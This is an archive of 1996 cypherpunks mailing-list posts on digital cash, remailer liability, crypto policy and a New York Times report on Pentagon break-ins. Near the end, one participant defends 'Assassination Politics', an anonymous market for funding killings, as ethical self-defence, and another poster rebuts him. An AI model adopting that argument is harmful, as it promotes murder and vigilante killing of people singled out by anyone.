it was so much easier to play with the cards that automatically
kept track of your money. Finally, the Journal reported that
there are 18,244 pachinko parlors in Japan.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Fri, 24 May 1996 04:33:18 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605231521.IAA18698@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


                  Copyright 1996 The New York Times Company
                                     ^^^^^^^^^^^^^^ 
           Report Warns of Security Threats Posed by Computer Hackers
                                    ^^^^^^           ^^^^^^^^ ^^^^^^^
           [W] ASHINGTON -- Government investigators warned
           Wednesday that computer hackers cruising the
                                           ^^^^^^^^
           Internet posed a serious and growing threat to national
           ^^^^^^^^            
           security, with the Pentagon suffering as many as 250,000
                                                            ^^^^^^^
           "attacks" on its computers last year.
           ^       ^


-- 
Love,
Qut@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 24 May 1996 04:53:27 +0800
To: cypherpunks@toad.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <01I50K5LNPQG8Y4X9G@mbcl.rutgers.edu>
Message-ID: <4o205r$7br@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <01I50K5LNPQG8Y4X9G@mbcl.rutgers.edu>,
E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU> wrote:
>From:  IN%"iang@cs.berkeley.edu" 22-MAY-1996 14:51:29.42
>
>>In the "normal" protocol, the payee has to go online.  In the "anon" protocol,
>>the payer has to go online.  Since you don't want to go online when you
>>walk into a shop, you can pay the shop with the "normal" protocol, and
>>the shop gives you change with the "anon" protocol.
>
>>That way, you never need to go online, and your identity is never compromised.
>
>       However, the shop's still is, although the bank might not be able to
>determine as much about how much income is coming in. OTOH, we're talking about
>a physical shop situation; I'm not sure how critical it is to have shop
>anonymnity with payor cooperation for this, since the payor can break it
>anyway.

Ah.  I see I was misunderstood.  The goal was not to make the shop anonymous,
but rather to be able to provide change to an anonymous payer.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaSD4kZRiTErSPb1AQEa5gP/V1hAcycmBO9MMqQUng3ZdHejVgHLCa7J
1KHQgVKjJGRpUUCcARo0Yl3wtwRc2sX6TboUewVxBGAg6BLFzwwGY8D1ZgLaDk3D
ktfAn3H15QF/qsdDQVyixu5P37ly1NEeU9ff5UO/KggvwGXs8jZzBXLdsvQWgbKl
Ks5qQCwd/4I=
=Fkgx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Fri, 24 May 1996 02:46:54 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Number one story on CNN this hour.
In-Reply-To: <Pine.SUN.3.91.960522220202.10038B-100000@tipper.oit.unc.edu>
Message-ID: <Pine.HPP.3.91.960523085227.28690A-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


They forgot to mention that there are ~100 milllion 2 ton missiles 
roaming freely throughout the USA.

I guess we'll need a disarmament policy for automobiles now. ;-)

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."

On Wed, 22 May 1996, Simon Spero wrote:

> On Wed, 22 May 1996, Alan B. Clegg wrote:
> 
> > There are 40 million 'attack capable' systems connected to the Internet 
> > and over 120 countries have developed or are developing 'attack software'.
> 
> Does that mean I need a concealed carry permit for my Newton? 
> 
> Simon
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 24 May 1996 01:48:54 +0800
To: Kurt Vile <vile@burris.apdg.com>
Subject: Re: Floating Point and Financial Software
In-Reply-To: <9605222358.AA08828@burris.apdg.com>
Message-ID: <199605231257.IAA26297@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Kurt Vile writes:
> The Federal Reserve Bank, European Ecomonic Community, England,  
> France, Germany, Japan, Canada, etc store their historical data in a  
> time series database called FAME, which does 64 bit representation  
> of floating point data....

FAME is NOT an accounting package. I'm talking about accounting. 

> The Options Clearing Corporation does all of their clearing in 64  
> bit floats, for one.

Options are traded in integral units. Why would they use floats for
counting them?

> Swiss Bank/O'connor, NationsBank/CRT, Fannie Mae, Merril Lynch use  
> NeXT's as their trading platform so you can rest assured that they  
> are using 64's

1) Most of those firms have used *some* NeXT machines, none have used
   them exclusively. (My friends who were at Swiss Bank used HPs. My
   friends at M-L use Suns). In any case, it doesn't matter. Why would
   the native floating point representation of the machine have
   anything to do with accounting? Most of the accounting in those
   firms wasn't ever done on their trading platforms at all anyway --
   many of them still do all their accounting on mainframes, and
   whether they use mainframes or not they tend to write their
   accounting on top of database packages that have exact numerical
   representations available for money. The accounting systems are in
   any case back office systems, not front office systems, and have
   nothing to do with the trading platforms.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 24 May 1996 06:08:25 +0800
To: shabbir@vtw.org (Shabbir J. Safdar)
Subject: The Political Map, (was Re: FTC online workshop on privacy)
Message-ID: <199605231643.JAA23120@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 AM 5/23/96 -0400, Shabbir J. Safdar wrote:
>There's actually an interesting parallel here.  If you look at the
>Dworkin "ban pornography because speech is action" crowd, they often
>end up on the same side of things as the Christian Coalition "ban porn
>because it drives you to ungodly acts" crowd.  They both happily support
>legislation that would ban such images.  The left and the right move so
>far off the edges of the scales that they come around and meet each other
>on the same side of the issue.

This is because any analysis of political opinion that tries to reduce it
to a one dimensional metric is ipso facto wrong.  Two dimensions gives you
a much better match.  (Try personal freedom on one axis and economic
freedom on the other.)  I suspect the more dimensions you include, the
better you analysis will be.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 24 May 1996 06:34:45 +0800
To: Voters Telecommunications Watch <cypherpunks@toad.com
Subject: Re: INFO: Transcript of Sen. Leahy's RealAudio chat now available! (5/22/96)
Message-ID: <199605231655.JAA26293@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:34 AM 5/23/96 -0400, Voters Telecommunications Watch wrote:
>           REALAUDIO TRANSCRIPTS OF LEAHY'S WIREDSIDE CHAT AVAILABLE
>                              Date: May 22, 1996
>         URL:http://www.crypto.com/            crypto-news@panix.com
>NEWS
>Rave reviews of Senator Leahy's appearance on HotWired's WiredSide chat
>are coming already.  With this appearance, the gentleman from Vermont
>proves once again that he knows net.politics on a personal level, and
>can understands the subtleties that we assume many in Congress are just
>learning.

Well, he must have learned it all in the last few months, because his bill 
was the closest thing to DOA that we've seen in a long time, exceeded only 
by GAK 3.  I'd like to hear from him what the source of the text of the 
Leahy bill on encryption really was:  Who pressured him to make it so bad?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Fri, 24 May 1996 03:53:58 +0800
To: cypherpunks@toad.com
Subject: nyt: Report Warns of Security Threats Posed by Computer Hackers
Message-ID: <9605231405.AA12953@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



                 Copyright 1996 The New York Times Company

          May 23, 1996

          Report Warns of Security Threats Posed by Computer
          Hackers

          By PHILIP SHENON

          [W] ASHINGTON -- Government investigators warned
              Wednesday that computer hackers cruising the
          Internet posed a serious and growing threat to national
          security, with the Pentagon suffering as many as 250,000
          "attacks" on its computers last year.

          The investigators, from the General Accounting Office,
          offered scenarios in which terrorists or enemy
          governments might break into Defense Department computer
          networks and shut them down, cutting off communications
          between military commanders in the middle of a war.

          "There will become an increasingly attractive way for
          terrorists or adversaries to wage attacks," the
          investigators said in a report prepared for two
          congressional committees. "The potential for
          catastrophic damage is great."

          The Pentagon did not dispute the findings of the study,
          although Defense Department officials said they knew of
          no instance in which hackers had obtained secret
          information or gained access to computer networks that
          control the firing of weapons. "We are certainly well
          aware that people are breaking in or trying to hack into
          our systems," said Susan Hansen, a department
          spokeswoman.

          While the Pentagon is developing encryption devices that
          show promise in defeating computer hackers, the
          accounting office, which is the investigative arm of
          Congress, warned that none of the proposed technical
          solutions was foolproof, and that the military's current
          security program was "dated, inconsistent and
          incomplete."

          The explosion in the use of the Internet and the
          increasing power and sophistication of small desktop
          computers has compounded the Pentagon's problems,
          creating a worldwide army of hackers able to break into
          all but the most secure computer networks.

          The report cited Defense Department estimates that the
          number of unauthorized efforts to enter its computer
          systems -- "attacks," in the parlance of cyberspace --
          was doubling every year and may have reached 250,000 in
          1995, most of them made through the Internet.

          Pentagon figures suggest that in about 65 percent of
          those efforts, hackers were able to gain entry to a
          computer network.

          The investigators provided details on several recent
          attacks on the Pentagon's computers, including a 1994
          incident in which two computer hackers were able to gain
          "complete access to all of the information" on the
          computer systems of the Rome Air Development Center, the
          Air Force laboratory in Rome, N.Y., where the Defense
          Department carries out some of its most important
          research on weapons systems.

          The report said the hackers rummaged through the
          computer networks for several days and stole information
          on the methods used by Air Force commanders to relay
          secret intelligence and targeting information during
          wartime.

          Working through the Internet and a variety of phone
          switches in South America, the hackers also used the
          laboratory's computers as a "launching platform to
          attack other military, government, commercial and
          academic systems worldwide," including the
          Wright-Patterson Air Force Base in Ohio and the Goddard
          Space Flight Center in Greenbelt, Md., the report said.

          One of the hackers, a Briton whose code name was
          "Datastream Cowboy," was later arrested in England. The
          authorities say they do not know the nationality of the
          other hacker, whose code name is "Kuji" and who was
          never apprehended.

          "There may have been some national security risks
          associated with the Rome incident," the report said.
          "Air Force officials told us that at least one of the
          hackers may have been working for a foreign country
          interested in obtaining military research data or
          information on areas in which the Air Force was
          conducting advanced research." The foreign country was
          not identified in the report.

          In separate incidents between April 1990 and May 1991,
          the report said, hackers from the Netherlands broke into
          computer networks at 34 Defense Department sites and
          browsed the electronic-mail systems of several
          department officials, calling up all messages that
          contained the key words "nuclear," "weapons" or
          "missile."

          The accounting office investigator who oversaw the
          report, Jack L. Brock Jr., said in testimony Wednesday
          before the Senate Permanent Subcommittee on
          Investigations that more than 120 nations are reported
          to be developing "information warfare techniques" that
          could "allow our enemies to seize control of public
          networks which Defense relies upon for communications."

          "Countries today do not have to be military superpowers
          with large standing armies, fleets of battleships or
          squadrons of fighters to gain a competitive edge," he
          said. "Instead, all they really need to steal sensitive
          data or shut down military computers is a $2,000
          computer and modem and a connection to the Internet."

          The investigators said the Pentagon had made itself
          vulnerable to attack by making itself so dependent on
          computers and the Internet, a system that its own
          researchers created in the 1970s.

          "Defense's computer systems are particularly susceptible
          to attack through connections on the Internet, which
          Defense uses to enhance communication and information
          sharing," the report said, noting that an estimated 40
          million people worldwide are Internet users. "In turning
          to the Internet, Defense has increased its own exposure
          to attacks."

          The Pentagon uses the Internet to distribute electronic
          mail and other information. During the war in the
          Persian Gulf, the Defense Department used the Internet
          to communicate with allied armies and gather and
          distribute intelligence information.



_______________________
Regards,            When we ask advice, we are usually looking for 
                    an accomplice. -Marquis de la Grange
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph L. Moll" <jmoll@acquion.com>
Date: Fri, 24 May 1996 02:48:45 +0800
To: cypherpunks@toad.com
Subject: Lotus Notes 4.0 stream encryption.
Message-ID: <2.2.32.19960523140749.006ac8dc@mail.acquion.com>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone comment on this?
---
Joseph L. (Joe) Moll  mailto:jmoll@acquion.com
Network and Communications Engineering
http://www.acquion.com  phone:864-281-4108  fax:864-281-4576
ACQUION, Inc.  Greenville, SC  USA -- Specialists in Electronic Commerce
disclaimer:  This email is not to be considered official correspondence
---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 24 May 1996 07:23:55 +0800
To: cypherpunks@toad.com
Subject: Re: CLI_pr3
Message-ID: <adc9f0fc00021004c036@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:17 PM 5/23/96, John Young wrote:
>   5-23-96. WaJo:
>
>   "Chasing Criminals at Cyberspeed."
....
>      Says Stanley Morris, director of FinCEN, "The only way
>      we can adequately assist our federal law enforcement
>      counterparts in following the trail of the multinational
>      money launderer is through our linkages with
>      multilateral arrangements such as ... [Clipper 3]."

Of course, this appears to be implying that _domestic_ data will be subject
to Clipper 3  restrictions, else this statement is meaningless.

So, will my stored-value cards that I "charge up" in California and carry
in my wallet to Zurich be GAKked? If not, Morris's statement is
meaningless. If so, domestic data is intended to be GAKked.

(But we knew this, didn't we?)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Fri, 24 May 1996 07:07:27 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <2.2.32.19960523174541.006b98dc@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:30 PM 5/22/96 -0400, Joined Trill wrote:

>On certain political newsgroups (perhaps most noticeably in the
>soc.culture.* heirarchy) it's common to see someone's views refuted
>because they are identified with a particular interest group. 

Now _there_ is a good point, well-known to the sort of people I'm concerned
about presenting good advocacy to. Thanks!

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leonard Janke <janke@unixg.ubc.ca>
Date: Fri, 24 May 1996 07:29:20 +0800
To: Jay Haines <jay_haines@connaught-usa.com>
Subject: Re: (Another) alternative to
In-Reply-To: <n1379284116.57328@flu.connaught-usa.com>
Message-ID: <Pine.SOL.3.91.960523104104.6918A-100000@netinfo.ubc.ca>
MIME-Version: 1.0
Content-Type: text/plain




On 23 May 1996, Jay Haines wrote:

>         Reply to:   RE>(Another) alternative to remailer shutdowns
> 
> Where would these message parts be put back together/decrypted? Wouldn't this
> require the receivers mail program to re-generate the original message?
> 
> [my stuff]

Yes, it would require work on the part of the receiver to put the message
back  together. 

This shouldn't be too difficult, though. The receiver's software
could look through all random messages of the same length and xor them 
together to see if something non-random popped out. Alternatively, a
"standard" format for these split messages could include the 
a random message ID as the last 160 bits of one part of the message 
and the SHA hash of this ID in the last 160 bits of the other part.
(The idea is to keep the messages looking random  for legal reasons.)

Remailer operators may want to add a note to message to the effect of
"For legal reasons, this remailer only sends random looking text. For
information on the possible usefulness of random looking text visit
<joe neutral's home page>." 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CRYPTO" <crypto@nas.edu>
Date: Fri, 24 May 1996 04:46:03 +0800
To: farber@cis.upenn.edu
Subject: The National Research Council Study of National...
Message-ID: <9604238328.AA832875005@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject:
The National Research Council Study of National Cryptography Policy

  (An incorrect web page/URL locator was posted in the previous message;
  apologies.
  If you found your way to the right page anyway and signed up for
  information, you don't need to do it again.)

  Please post this message widely

  I am writing to let interested parties know about the imminent release
  of the NRC's study of national cryptography policy.  If
  all goes well, we hope to release it on May 30, 1996.
  However, prior to that time, we won't be able to comment on
  its contents.

  For current information on release, visit the web site
  http://www2.nas.edu/cstbweb/notifyme.html

  When you visit that site, you'll have the opportunity to
  be put onto a mailing list so that we can inform you by e-mail
  when the report is available in print and/or electronically, as well
  as any public events associated with the report (e.g., public
  briefings).

  Herb Lin
  Cryptography Policy Study Director
  Computer Science and Telecommunications Board
  National Academy of Sciences/National Research Council
  202-334-2605





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 24 May 1996 07:50:49 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <199605231809.LAA00519@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:02 PM 5/22/96 -0700, Martin Minow wrote:
>Black Unicorn <unicorn@schloss.li> comments on the responsiblity
>of prudent persons (in, I presume, the context of threating e-mail
>sent through an anonymous remailier).
>
>I'm still perplexed: what can a "prudent" remailer operator do if a
>threatening e-mail was sent through a remailer under one or more of
>the following conditions:
>
>-- The remailer operator is legally enjoined from reading messages
>   transversing his system. (For example, the remailer is subject to
>   data privacy laws.)
>
>-- The message was encrypted using the intended recipient's public key.
>   (This means that, without access to the private key, the operator
>   has no mechanism to examine the e-mail.)

That's just it, the government wants (or, will want) "the prudent operator" 
to SHUT DOWN his system entirely. We, on the other hand, should take the 
position that operating a remailer is a right, and further that such 
remailers get a broad immunity for materials send through their system.  

Providing for the opposite  was one of the reasons the Leahy bill on 
encryption was so bad.  It criminalized use of encryption to "thwart a 
law-enforcement investigation" and there was no way for a (encrypted) 
remailer operator to know that any given message flowing through his system 
might eventually trigger such an investigation.  In fact, the prospect of 
the government actually setting up such an operator by having his remailer 
act as the last link in the chain of an otherwise-untraceable message, whose 
transmission could arguably be a violation of law.  
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brian dodds <jyacc!aspen!bdodds@uunet.uu.net>
Date: Fri, 24 May 1996 06:07:25 +0800
To: Simon Spero <aspen!uunet!tipper.oit.unc.edu!ses@uunet.uu.net>
Subject: Re: Number one story on CNN this hour.
In-Reply-To: <Pine.SUN.3.91.960522220202.10038B-100000@tipper.oit.unc.edu>
Message-ID: <Pine.SUN.3.91.960523112429.18906V-100000@aspen>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 May 1996, Simon Spero wrote:

> > There are 40 million 'attack capable' systems connected to the Internet 
> > and over 120 countries have developed or are developing 'attack software'.
> 
> Does that mean I need a concealed carry permit for my Newton? 

yes, you're now carrying what the media would call an `assault pda'.. 
it's small, black, military-styled, and fully automatic.. 

				bri..

--bdodds@jyacc.com
brian dodds, systems administration, jyacc, inc. wellesley, ma 
--617.431.7431x125
opinions expressed within are not necessarily my own or anyone elses..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lauren Amy Gelman <gelmanl@gwis2.circ.gwu.edu>
Date: Fri, 24 May 1996 05:24:22 +0800
To: cypherpunks@toad.com
Subject: Children's Privacy Act
In-Reply-To: <Mld4zwG00YUzE1rWMx@andrew.cmu.edu>
Message-ID: <Pine.3.89.9605231121.A2827-0100000@gwis2.circ.gwu.edu>
MIME-Version: 1.0
Content-Type: text/plain



The text of the Children's Privacy Protection and Parental Empowerment 
Act is available at the Epic "Children's Privacy" web site:

http://epic.org/privacy/kids/

Read it before you trash it!


------------

Summary:

Rep. Bob Franks (R-NJ) and Senator Diane Feinstein (D-CA) have introduced 
the Children's Privacy Protection and Parental Empowerment Act. The bill 
would establish fair information practices for personal information about 
kids and curb recent abuses in the direct marketing industry.

The Children's Privacy Protection and Parental Empowerment Act would:

Prohibit the sale or purchase of personal information about children 
   without parental consent.

Require list brokers and solicitors to disclose to parents, upon request,
   the source and content of personal information on file about their 
   children.

Require list brokers to disclose to parents, upon request, the names of 
   persons or entities
   to whom they have distributed personal information on that 
   parent's child.

Prohibit prisoners and convicted sex criminals from processing the personal 
   information of children.

Prohibit any exchange of children's personal information that one has a reason
   to believe will be used to harm or abuse a child. 


----------------------------------------------------------------------------
----------------------------------------------------------------------------
Lauren Amy Gelman				gelmanl@gwis2.circ.gwu.edu
George Washington University			gelman@epic.org
Science, Technology, and Public Policy Program	gelman@acm.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leonard Janke <janke@unixg.ubc.ca>
Date: Fri, 24 May 1996 08:12:58 +0800
To: cypherpunks@toad.com
Subject: The last node in split message remail schemes
In-Reply-To: <n1379284116.57328@flu.connaught-usa.com>
Message-ID: <Pine.SOL.3.91.960523105755.6918B-100000@netinfo.ubc.ca>
MIME-Version: 1.0
Content-Type: text/plain



I would like to add an extension to my proposal for split message
anonymous remailing schemes. The current proposal counts on the good will
of the senders to split their messages into random pieces. If a remailer
operator receives non-random text I can think of at least three options
for what to do:

1) The operator can drop the message. 
2) The remailer operator can split the message him or herself and send 
   the pieces through new remailer chains.  
3) Suppose there is a computer named Moe that lives on the internet,
   is hidden behind a nym, and splits messages and enters the pieces into
   remailer chains. The remailer can then encrypt the non-random text
   along with a "please forward to" command to Moe, and  send the ciphertext
   anonymously to Moe. (Due to the encryption there is no need to split
   this message.)
   
The risk, in ascending terms of legal danger, for the operator would
be 1), 3), and 2). Nevertheless, all three alternatives should be safe 
within a secure (in the sense of Chaum, 1981) remailer network.

Leonard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 24 May 1996 08:30:50 +0800
To: cypherpunks@toad.com
Subject: [SCARE]:  "If you only knew what we know..."
Message-ID: <adca03eb020210043329@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:53 PM 5/23/96, jim bell wrote:

>Well, he must have learned it all in the last few months, because his bill
>was the closest thing to DOA that we've seen in a long time, exceeded only
>by GAK 3.  I'd like to hear from him what the source of the text of the
>Leahy bill on encryption really was:  Who pressured him to make it so bad?

"If you only knew what we know..."

("...you wouldn't support encryption, you wouldn't push for privacy
legislation, you would order all citizen-units to have tatooed ID numbers
on their arms...")

Though I normally avoid "Wired," I did pick up the latest issue to skim
through. A couple of good things, actually, including a nice summary of the
state of crypto laws, etc. (I don't recall the author, as I didn't buy the
issue.)

A great discussion of the Deepest and Darket Secret in Washington, the
special "If you only knew what we know..." briefing given to legislators,
staffers, etc. to convince them of the Evils of Cryptography.

Paraphrasing the "Wired" item, "No person who has ever received "The
Briefing" has ever again argued forcefully for the rights of citizens to
use strong cryptography."

I surmise that either Sen. Burns has not yet been given The Briefing, or he
is for some reason more resistant than most other burrowcrats to the scare
tactics used in The Briefing.

I sure would like to know what's in this briefing.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 24 May 1996 05:57:53 +0800
To: reagle@MIT.EDU (Joseph M. Reagle Jr.)
Subject: Re: nyt: Report Warns of Security Threats Posed by Computer Hackers
In-Reply-To: <9605231405.AA12953@rpcp.mit.edu>
Message-ID: <199605231708.MAA19410@homeport.org>
MIME-Version: 1.0
Content-Type: text


The government made this bed, now they need to sleep in it.

Strong encryption and authentication would go a long way towords
making the net safer.  But the NSA wants the market fragmented & weak.

(Strong encryption is not a cure-all, nor a replacement for firewalls.
But it is a needed part of the infrastructure.)

Adam

|                  Copyright 1996 The New York Times Company
| 
|           May 23, 1996
| 
|           Report Warns of Security Threats Posed by Computer
|           Hackers
| 
|           By PHILIP SHENON
| 
|           [W] ASHINGTON -- Government investigators warned
|               Wednesday that computer hackers cruising the
|           Internet posed a serious and growing threat to national
|           security, with the Pentagon suffering as many as 250,000
|           "attacks" on its computers last year.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 24 May 1996 08:41:39 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <199605231913.MAA03950@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 PM 5/22/96 -0700, Vladimir Z. Nuri wrote:

>>>the above sentence I find absolutely abhorrent: it justifies killing,
>>>not merely because of the effect (the sort of "ends-justifies-the-means"
>>>argument used by most here), but that in addition it is 
>>>supposedly "ethical". ethical?!?!? 
>>
>>Then you've obviously dramatically mis-read my ideas.  I don't claim that 
>>_EVERYBODY_ who will fall victim will "deserve" it by your or my opinions, 
>
>oh, so in other words, a lot of "innocent" people will be murdered
>under AP. ah, another great "feature", not a "bug", right??

Tell ya what: name a weapon that CANNOT be used to harm an innocent 
person.  Go ahead, I'm waiting.


>>For example, if you believe in NIOFP, then anyone who violates it has 
>>initiated force, and the victim of such force (or, perhaps, anyone else?) 
>>can legitimately use a system like AP to fight back.
>
>what is "legitimate"? in our government, "legitimate" refers to our
>judicial system.

"Legal" is the word you're looking for, not legitimate.

> it is what determines what is "legitimate" based
>on laws. in your AP anarchy scheme, the word "legitimate" has no meaning.
>"legitimate" is in the eye of the beholder. this ridiculous and
>impractical definition was discarded centuries ago because of the
>free-for-all bloody violence it inevitably leads to. 

What?!?  You mean that after 100 million war deaths in this century alone, 
you're suggesting that we DON'T have "free-for-all bloody violence"?  Or are 
you simply used to the kind of violence that exists today?  That's a common 
trap people fall into:  They simply accept whatever current system we have, 
as if it is somehow required or okay or...


>be very
>clear about what you are advocating: in AP, there are no laws.

Right!  There are no "laws" per se.  But there are people, and their 
interests, and what they believe to be their rights.

> people
>do not rely on the judicial system to solve their problems.

RIGHT!  But as importantly, they aren't the _victims_ of that "judicial 
system" either.  Rodney King, for instance.  Donald Scott.  Randy Weaver.  
The Branch Davidians, etc.  All these people were fundamentally victims of 
an organization political/legal heirarchy filled with people who had 
(defacto) greater rights/authority than ordinary citizens, and abused the 
public with it.

> they
>take the "law" into their own hands and take out contracts on anyone
>who offends them. would they feel justified in killing people who
>disagree with them on cyberspace mailing lists? perhaps, who is to tell?

I've explained that I believe that the post-AP world will be far less 
violent than today, partly because there will be no people in positions of 
authority who can abuse the rest of us with impunity, or force us to go to 
war against our will.  It will also allow GOOD people to punish BAD people 
without depending on the "system" to do it.  It will also tend to prevent 
the enforcement of "victimless crime" laws that currently result in 60-70% 
of the prison and jail population.

 You need to show that yes, you see the advantages, but also show that you 
have a plausible belief that my system will be worse than the status quo.  
Citing a specific potential problem without quantifying it is pointless.


>>You seem to be assuming that if there are TWO "wrongs" here.  But I've tried 
>>to make it abundantly clear that justification for the self-defense comes 
>>from the initial "wrong."
>
>but who decides what is wrong?

Each individual, for himself.  True, he may occasionally make mistakes, but 
I contend that the vast majority of these decisions will be entirely 
justified.  The truly bad people, the REAL criminals, will not last long.

> the arbitrary opinion of some single
>human idiot out anywhere in the world? don't you see the tyranny
>of this? it is far worse than the tyranny of a government if I were
>to be killed by someone who believes that I violated his rights
>by breathing air particles or whatever. via AP, you wish to give him
>the mechanism to murder me without trace.

If the danger you describe was of higher probability than the alternative, 
the status quo, you might have a point.  But it isn't.  Further, the 
prospect of AP getting rid of (or reforming, because they'll have no choice) 
most of the real criminals (plus de-populating government and preventing its 
abusiveness) results in a dramatic reduction in the violations of rights 
that will occur.


>>  Where, then, is the SECOND "wrong"?  What, 
>>exactly, makes it wrong?  If a person can't get justice any other way (not 
>>to be confused with merely a chance at justice) then why deny that person 
>>his rights?
>
>deny rights, legitimacy, justice, blah, blah, blah. the terms you use have no 
>meaning in the system you are advocating. there are no "rights" in an anarchy,
>because a government is the entity created to safeguard/protect them.

Just because we currently think of "the government" as "the entity created 
to safeguard rights" doesn't mean that this is really so, and it doesn't 
mean that it actually achieves a net protection of our rights.  What 
government actually does is to monopolize (as best it can) the use of force, 
and then force the public to pay for a protection service.  And monopolies 
result in classicly bad service, as we all know.

>all actions are legitimate in an anarchy, because there is no civilized
>system that rejects any ones in particular.

If the probability of an improper action is dramatically reduced, without 
being eliminated, that is an improvement, right?  Tell me, as a citizen 
don't we deserve changing to a system that reduces violations of rights?


>>>It should be obvious to anyone around here that if AP "works," it will work 
>>regardless of whether it meets with your approval or any other subset of 
>>humankind.  That makes it worthy of discussion even if you don't like it.
>
>it will "work" exactly as anonymous murdering now works. AP already exists, 
>that's what you don't understand.

No, it doesn't, certainly not quantitatively, and in practice not 
qualitatively, either.  

Take a 5-foot wave, and notice that it doesn't overflow a 50-foot seawall.  
Twenty of them, separately, likewise don't get past it.  But combine them in 
one large wave, and the 100-foot wave does get by.  The fundamental 
advantage of AP is that the desires of thousands of people can be combined 
in order to accomplish what no individual would be able to induce on his own.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 24 May 1996 09:10:00 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: assassinating an AP proponent
